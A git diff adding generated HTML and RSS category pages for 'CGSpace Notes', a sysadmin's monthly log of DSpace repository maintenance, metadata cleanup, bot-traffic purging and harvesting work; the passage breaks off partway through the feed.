+ + + + + + + + + diff --git a/docs/categories/index.xml b/docs/categories/index.xml new file mode 100644 index 000000000..fad5a3ad4 --- /dev/null +++ b/docs/categories/index.xml @@ -0,0 +1,20 @@ + + + + Categories on CGSpace Notes + https://alanorth.github.io/cgspace-notes/categories/ + Recent content in Categories on CGSpace Notes + Hugo -- gohugo.io + en-us + Sat, 01 Jul 2023 17:14:36 +0300 + + Notes + https://alanorth.github.io/cgspace-notes/categories/notes/ + Sat, 01 Jul 2023 17:14:36 +0300 + + https://alanorth.github.io/cgspace-notes/categories/notes/ + + + + + diff --git a/docs/categories/notes/index.html b/docs/categories/notes/index.html new file mode 100644 index 000000000..a55b289c5 --- /dev/null +++ b/docs/categories/notes/index.html @@ -0,0 +1,425 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

July, 2023

+ +
+ 2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as “Copyrighted; all rights reserved” based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it’s usually copyrighted (could still be open access, but we can’t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status… In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don’t like the Impact Area icons as a component because they don’t have any visual meaning + Read more → +
+ + + + + + +
+
+

June, 2023

+ +
+

2023-06-02

+
    +
  • Spend some time testing my post_bitstreams.py script to update thumbnails for items on CGSpace +
      +
    • Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail…
    • +
    +
  • +
  • Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace +
      +
    • They have experience with improving the MODS interface in MELSpace’s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
    • +
    • From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

May, 2023

+ +
+

2023-05-03

+
    +
  • Alliance’s TIP team emailed me to ask about issues authenticating on CGSpace +
      +
    • It seems their password expired, which is annoying
    • +
    +
  • +
  • I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week +
      +
    • There are many of our subjects that would match if they added a “-” like “high yielding varieties” or used singular…
    • +
    • Also I found at least two spelling mistakes, for example “decison support systems”, which would match if it was spelled correctly
    • +
    +
  • +
  • Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2023

+ +
+

2023-04-02

+
    +
  • Run all system updates on CGSpace and reboot it
  • +
  • I exported CGSpace to CSV to check for any missing Initiative collection mappings +
      +
    • I also did a check for missing country/region mappings with csv-metadata-quality
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2023

+ +
+

2023-03-01

+
    +
  • Remove cg.subject.wle and cg.identifier.wletheme from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
  • +
  • iso-codes 4.13.0 was released, which incorporates my changes to the common names for Iran, Laos, and Syria
  • +
  • I finally got through with porting the input form from DSpace 6 to DSpace 7
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2023

+ +
+

2023-02-01

+
    +
  • Export CGSpace to cross check the DOI metadata with Crossref +
      +
    • I want to try to expand my use of their data to journals, publishers, volumes, issues, etc…
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2023

+ +
+

2023-01-01

+
    +
  • Apply some more ORCID identifiers to items on CGSpace using my 2022-09-22-add-orcids.csv file +
      +
    • I want to update all ORCID names and refresh them in the database
    • +
    • I see we have some new ones that aren’t in our list if I combine with this file:
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2022

+ +
+

2022-12-01

+
    +
  • Fix some incorrect regions on CGSpace +
      +
    • I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions
    • +
    +
  • +
  • Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
  • +
  • Replace “East Asia” with “Eastern Asia” region on CGSpace (UN M.49 region)
  • +
+ Read more → +
+ + + + + + +
+
+

November, 2022

+ +
+

2022-11-01

+
    +
  • Last night I re-synced DSpace 7 Test from CGSpace +
      +
    • I also updated all my local 7_x-dev branches on the latest upstreams
    • +
    +
  • +
  • I spent some time updating the authorizations in Alliance collections +
      +
    • I want to make sure they use groups instead of individuals where possible!
    • +
    +
  • +
  • I reverted the Cocoon autosave change because it was more of a nuissance that Peter can’t upload CSVs from the web interface and is a very low severity security issue
  • +
+ Read more → +
+ + + + + + + + + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/notes/index.xml b/docs/categories/notes/index.xml new file mode 100644 index 000000000..8ae193f7c --- /dev/null +++ b/docs/categories/notes/index.xml @@ -0,0 +1,1490 @@ + + + + Notes on CGSpace Notes + https://alanorth.github.io/cgspace-notes/categories/notes/ + Recent content in Notes on CGSpace Notes + Hugo -- gohugo.io + en-us + Sat, 01 Jul 2023 17:14:36 +0300 + + July, 2023 + https://alanorth.github.io/cgspace-notes/2023-07/ + Sat, 01 Jul 2023 17:14:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-07/ + 2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning + + + + June, 2023 + https://alanorth.github.io/cgspace-notes/2023-06/ + Fri, 02 Jun 2023 10:29:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-06/ + <h2 id="2023-06-02">2023-06-02</h2> +<ul> +<li>Spend some time testing my <code>post_bitstreams.py</code> script to update thumbnails for items on CGSpace +<ul> +<li>Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;</li> +</ul> +</li> +<li>Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace +<ul> +<li>They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace</li> +<li>From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk</li> +</ul> +</li> +</ul> + + + + May, 2023 + https://alanorth.github.io/cgspace-notes/2023-05/ + Wed, 03 May 2023 08:53:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-05/ + <h2 id="2023-05-03">2023-05-03</h2> +<ul> +<li>Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace +<ul> +<li>It seems their password expired, which is annoying</li> +</ul> +</li> +<li>I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week +<ul> +<li>There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;</li> +<li>Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was 
spelled correctly</li> +</ul> +</li> +<li>Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace</li> +</ul> + + + + April, 2023 + https://alanorth.github.io/cgspace-notes/2023-04/ + Sun, 02 Apr 2023 08:19:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-04/ + <h2 id="2023-04-02">2023-04-02</h2> +<ul> +<li>Run all system updates on CGSpace and reboot it</li> +<li>I exported CGSpace to CSV to check for any missing Initiative collection mappings +<ul> +<li>I also did a check for missing country/region mappings with csv-metadata-quality</li> +</ul> +</li> +<li>Start a harvest on AReS</li> +</ul> + + + + March, 2023 + https://alanorth.github.io/cgspace-notes/2023-03/ + Wed, 01 Mar 2023 07:58:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-03/ + <h2 id="2023-03-01">2023-03-01</h2> +<ul> +<li>Remove <code>cg.subject.wle</code> and <code>cg.identifier.wletheme</code> from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)</li> +<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28">iso-codes 4.13.0 was released</a>, which incorporates my changes to the common names for Iran, Laos, and Syria</li> +<li>I finally got through with porting the input form from DSpace 6 to DSpace 7</li> +</ul> + + + + February, 2023 + https://alanorth.github.io/cgspace-notes/2023-02/ + Wed, 01 Feb 2023 10:57:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-02/ + <h2 id="2023-02-01">2023-02-01</h2> +<ul> +<li>Export CGSpace to cross check the DOI metadata with Crossref +<ul> +<li>I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;</li> +</ul> +</li> +</ul> + + + + January, 2023 + https://alanorth.github.io/cgspace-notes/2023-01/ + Sun, 01 Jan 2023 08:44:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-01/ + <h2 id="2023-01-01">2023-01-01</h2> +<ul> +<li>Apply some more ORCID identifiers to items on CGSpace using my <code>2022-09-22-add-orcids.csv</code> file +<ul> +<li>I want to update all ORCID names and refresh them in the database</li> +<li>I see we have some new ones that aren&rsquo;t in our list if I combine with this file:</li> +</ul> +</li> +</ul> + + + + December, 2022 + https://alanorth.github.io/cgspace-notes/2022-12/ + Thu, 01 Dec 2022 08:52:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-12/ + <h2 id="2022-12-01">2022-12-01</h2> +<ul> +<li>Fix some incorrect regions on CGSpace +<ul> +<li>I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions</li> +</ul> +</li> +<li>Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!</li> +<li>Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)</li> +</ul> + + + + November, 2022 + https://alanorth.github.io/cgspace-notes/2022-11/ + Tue, 01 Nov 2022 09:11:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-11/ + <h2 id="2022-11-01">2022-11-01</h2> +<ul> +<li>Last night I re-synced DSpace 7 Test from CGSpace +<ul> +<li>I also updated all my local <code>7_x-dev</code> branches on the latest upstreams</li> +</ul> +</li> +<li>I spent some time updating the authorizations in Alliance collections +<ul> +<li>I want to make sure they use groups instead of individuals where possible!</li> +</ul> +</li> +<li>I reverted the Cocoon autosave change because it was more of a 
nuisance that Peter can&rsquo;t upload CSVs from the web interface and is a very low severity security issue</li> +</ul> + + + + October, 2022 + https://alanorth.github.io/cgspace-notes/2022-10/ + Sat, 01 Oct 2022 19:45:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-10/ + <h2 id="2022-10-01">2022-10-01</h2> +<ul> +<li>Start a harvest on AReS last night</li> +<li>Yesterday I realized how to use <a href="https://im4java.sourceforge.net/docs/dev-guide.html">GraphicsMagick with im4java</a> and I want to re-visit some of my thumbnail tests +<ul> +<li>I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8</li> +<li>I filed <a href="https://github.com/criteo/JVips/issues/141">an issue to ask about Java 11+ support</a></li> +</ul> +</li> +</ul> + + + + September, 2022 + https://alanorth.github.io/cgspace-notes/2022-09/ + Thu, 01 Sep 2022 09:41:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-09/ + <h2 id="2022-09-01">2022-09-01</h2> +<ul> +<li>A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet</li> +<li>I tested an item submission on DSpace Test with the Cocoon <code>org.apache.cocoon.uploads.autosave=false</code> change +<ul> +<li>The submission works as expected</li> +</ul> +</li> +<li>Start debugging some region-related issues with csv-metadata-quality +<ul> +<li>I created a new test file <code>test-geography.csv</code> with some different scenarios</li> +<li>I also fixed a few bugs and improved the region-matching logic</li> +</ul> +</li> +</ul> + + + + August, 2022 + https://alanorth.github.io/cgspace-notes/2022-08/ + Mon, 01 Aug 2022 10:22:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-08/ + <h2 id="2022-08-01">2022-08-01</h2> +<ul> +<li>Our request to add <a href="https://github.com/spdx/license-list-XML/issues/1525">CC-BY-3.0-IGO to SPDX</a> was approved a few weeks ago</li> +</ul> + + + + July, 2022 + https://alanorth.github.io/cgspace-notes/2022-07/ + Sat, 02 Jul 2022 14:07:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-07/ + <h2 id="2022-07-02">2022-07-02</h2> +<ul> +<li>I learned how to use the Levenshtein functions in PostgreSQL +<ul> +<li>The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing</li> +<li>Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first</li> +</ul> +</li> +</ul> + + + + June, 2022 + https://alanorth.github.io/cgspace-notes/2022-06/ + Mon, 06 Jun 2022 09:01:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-06/ + <h2 id="2022-06-06">2022-06-06</h2> +<ul> +<li>Look at the Solr statistics on CGSpace +<ul> +<li>I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query <code>dns:*msnbot* AND dns:*.msn.com</code></li> +<li>I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets</li> +</ul> +</li> +<li>I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent</li> +<li>I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent</li> +<li>I see 7,300 hits from 208.185.238.57 from Britannica, using a normal user agent +<ul> +<li>There seem to be many more of these:</li> +</ul> +</li> +</ul> + + + + May, 2022 + https://alanorth.github.io/cgspace-notes/2022-05/ + Wed, 04 May 2022 09:13:39 +0300 + +
https://alanorth.github.io/cgspace-notes/2022-05/ + <h2 id="2022-05-04">2022-05-04</h2> +<ul> +<li>I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too: +<ul> +<li>18.207.136.176</li> +<li>185.189.36.248</li> +<li>50.118.223.78</li> +<li>52.70.76.123</li> +<li>3.236.10.11</li> +</ul> +</li> +<li>Looking at the Solr statistics for 2022-04 +<ul> +<li>52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests</li> +<li>64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc</li> +<li>185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt</li> +<li>157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li> +<li>52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li> +<li>157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li> +<li>207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li> +<li>If I query Solr for <code>time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.</code> I see a handful of IPs that made 41,000 requests</li> +</ul> +</li> +<li>I purged 93,974 hits from these IPs using my <code>check-spider-ip-hits.sh</code> script</li> +</ul> + + + + April, 2022 + https://alanorth.github.io/cgspace-notes/2022-04/ + Fri, 01 Apr 2022 10:53:39 +0300 + + https://alanorth.github.io/cgspace-notes/2022-04/ + 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ + + + March, 2022 + https://alanorth.github.io/cgspace-notes/2022-03/ + Tue, 01 Mar 2022 16:46:54 +0300 + + https://alanorth.github.io/cgspace-notes/2022-03/ + <h2 id="2022-03-01">2022-03-01</h2> +<ul> +<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> + + + + February, 2022 + https://alanorth.github.io/cgspace-notes/2022-02/ + Tue, 01 Feb 2022 14:06:54 +0200 + + https://alanorth.github.io/cgspace-notes/2022-02/ + <h2 id="2022-02-01">2022-02-01</h2> +<ul> +<li>Meeting with Peter and Abenet about CGSpace in the One CGIAR +<ul> +<li>We agreed to buy $5,000 worth of credits from Atmire for future upgrades</li> +<li>We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization</li> +<li>We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one</li> +<li>We agreed to try to do more alignment of affiliations/funders with ROR</li> +</ul> +</li> +</ul> + + + + January, 2022 + https://alanorth.github.io/cgspace-notes/2022-01/ + Sat, 01 Jan 2022 15:20:54 +0200 + + https://alanorth.github.io/cgspace-notes/2022-01/ + <h2 id="2022-01-01">2022-01-01</h2> +<ul> +<li>Start a full harvest on AReS</li> +</ul> + + + + December, 2021 + https://alanorth.github.io/cgspace-notes/2021-12/ + Wed, 01 Dec 2021 16:07:07 +0200 + + https://alanorth.github.io/cgspace-notes/2021-12/ + <h2 id="2021-12-01">2021-12-01</h2> +<ul> +<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> +<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> + + + + November, 2021 + https://alanorth.github.io/cgspace-notes/2021-11/ + Tue, 
02 Nov 2021 22:27:07 +0200 + + https://alanorth.github.io/cgspace-notes/2021-11/ + <h2 id="2021-11-02">2021-11-02</h2> +<ul> +<li>I experimented with manually sharding the Solr statistics on DSpace Test</li> +<li>First I exported all the 2019 stats from CGSpace:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> + + + + October, 2021 + https://alanorth.github.io/cgspace-notes/2021-10/ + Fri, 01 Oct 2021 11:14:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-10/ + <h2 id="2021-10-01">2021-10-01</h2> +<ul> +<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> +<li>So we have 1879/7100 (26.46%) matching already</li> +</ul> + + + + September, 2021 + https://alanorth.github.io/cgspace-notes/2021-09/ + Wed, 01 Sep 2021 09:14:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-09/ + <h2 id="2021-09-02">2021-09-02</h2> +<ul> +<li>Troubleshooting the missing Altmetric scores on AReS +<ul> +<li>Turns out that I didn&rsquo;t actually fix them last month because the check for <code>content.altmetric</code> still exists, and I can&rsquo;t access the DOIs using <code>_h.source.DOI</code> for some reason</li> +<li>I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!</li> +<li>I will change <code>DOI</code> to <code>tomato</code> in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;</li> +<li>Even as <code>tomato</code> I can&rsquo;t access that field as <code>_h.source.tomato</code> in Angular, but it does work as a filter source&hellip; sigh</li> +</ul> +</li> +<li>I&rsquo;m having problems using the OpenRXV API +<ul> +<li>The syntax Moayad showed me last month doesn&rsquo;t seem to honor the 
search query properly&hellip;</li> +</ul> +</li> +</ul> + + + + August, 2021 + https://alanorth.github.io/cgspace-notes/2021-08/ + Sun, 01 Aug 2021 09:01:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-08/ + <h2 id="2021-08-01">2021-08-01</h2> +<ul> +<li>Update Docker images on AReS server (linode20) and reboot the server:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> +<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> +</ul> + + + + July, 2021 + https://alanorth.github.io/cgspace-notes/2021-07/ + Thu, 01 Jul 2021 08:53:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-07/ + <h2 id="2021-07-01">2021-07-01</h2> +<ul> +<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> + + + + June, 2021 + https://alanorth.github.io/cgspace-notes/2021-06/ + Tue, 01 Jun 2021 10:51:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-06/ + <h2 id="2021-06-01">2021-06-01</h2> +<ul> +<li>IWMI notified me that AReS was down with an HTTP 502 error +<ul> +<li>Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification</li> +<li>I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the <code>angular_nginx</code> container isn&rsquo;t running</li> +<li>I simply started it and AReS was running again:</li> +</ul> +</li> +</ul> + + + + May, 2021 + https://alanorth.github.io/cgspace-notes/2021-05/ + Sun, 02 May 2021 09:50:54 +0300 + + https://alanorth.github.io/cgspace-notes/2021-05/ + <h2 id="2021-05-01">2021-05-01</h2> +<ul> +<li>I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents: +<ul> +<li>&ldquo;RI/1.0&rdquo;, 1337</li> +<li>&ldquo;Microsoft Office Word 2014&rdquo;, 941</li> +</ul> +</li> +<li>I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;</li> +</ul> + + + + April, 2021 + https://alanorth.github.io/cgspace-notes/2021-04/ + Thu, 01 Apr 2021 09:50:54 +0300 + + https://alanorth.github.io/cgspace-notes/2021-04/ + <h2 id="2021-04-01">2021-04-01</h2> +<ul> +<li>I wrote a script to query Sherpa&rsquo;s API for our ISSNs: <code>sherpa-issn-lookup.py</code> +<ul> +<li>I&rsquo;m curious to see how the results compare with the results from Crossref 
yesterday</li> +</ul> +</li> +<li>AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal +<ul> +<li>I simply took everything down with docker-compose and then back up, and then it was OK</li> +<li>Perhaps one of the containers crashed, I should have looked closer but I was in a hurry</li> +</ul> +</li> +</ul> + + + + March, 2021 + https://alanorth.github.io/cgspace-notes/2021-03/ + Mon, 01 Mar 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-03/ + <h2 id="2021-03-01">2021-03-01</h2> +<ul> +<li>Discuss some OpenRXV issues with Abdullah from CodeObia +<ul> +<li>He&rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API</li> +<li>Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies</li> +</ul> +</li> +</ul> + + + + CGSpace CG Core v2 Migration + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + Sun, 21 Feb 2021 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p> +<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p> + + + + February, 2021 + https://alanorth.github.io/cgspace-notes/2021-02/ + Mon, 01 Feb 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-02/ + <h2 id="2021-02-01">2021-02-01</h2> +<ul> +<li>Abenet said that CIP found more duplicate records in their export from AReS +<ul> +<li>I re-opened <a href="https://github.com/ilri/OpenRXV/issues/67">the issue</a> on OpenRXV where we had previously noticed this</li> +<li>The shared link where the duplicates are is here: <a href="https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6">https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6</a></li> +</ul> +</li> +<li>I had a call with CodeObia to discuss the work on OpenRXV</li> +<li>Check the results of the AReS harvesting from last night:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span 